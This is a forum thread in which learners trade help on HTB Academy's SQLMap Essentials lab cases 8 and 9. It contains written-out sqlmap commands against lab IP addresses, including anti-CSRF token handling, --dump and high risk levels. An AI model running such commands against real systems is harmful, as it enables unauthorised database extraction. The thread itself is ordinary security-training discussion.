SQLMap Essentials HTB ACADEMY case 8

hello all, before I post my comment for help I want to clarify that this module in particular has had a few typos in flags and bugs throughout. Once again on this module after trying hundreds of commands I end up empty handed. I’m using python3 sqlmap.py -u http://157.245.46.136:31197/case9.php?id=1&uid --randomize=uid --batch -v 5 | grep URI any and all help appreciated!!

case 8 - you will need to use the --csrf -token=
To find the name of the token, use burp and load the url and look at the request, it should say the name of the token.
Save that request and use it with the flag ie
sqlmap -r file.txt --csrf-token=“tokenName” --batch --dump

The problem I had, I was using F12 dev tools and copying the cURL but the result would say it can’t find the token name, so I had to use burp instead to capture the request.

1 Like

Hello, I havent been unsuccessful at completing sqlmap case 8.

Ive tried the following commands:

sqlmap -r request.txt --csrf-url= http://161.35.41.48:30009/case8.php --csrf-token= S56J2VYC34zZPyLxHMQRLHjUWUdX8sRzRMnHY8COnw --cookie=q57abl4kklnsb1psr6565o4bdk

sqlmap -r request.txt --csrf-url= http://161.35.41.48:30009/case8.php --csrf-token= S56J2VYC34zZPyLxHMQRLHjUWUdX8sRzRMnHY8COnw --batch --dump -v 3 --level 5 --risk 3 --cookie=q57abl4kklnsb1psr6565o4bdk

Can someone provide me a hint or nudge me in the right direction?

I tried sqlmap -u "http://209.97.137.220:32065/case8.php" --data='id=1&t0ken=3K1613HjmC2Tzur93W6bgUvuxyOM6dDSSP8Qe1s8' --csrf-token='t0ken' --csrf-url='http://209.97.137.220:32065/case8.php', but finally it throws “anti-CSRF token ‘t0ken’ can’t be found at ‘http://209.97.137.220:32065/case8.php’” evrytime and I don’t know why :upside_down_face: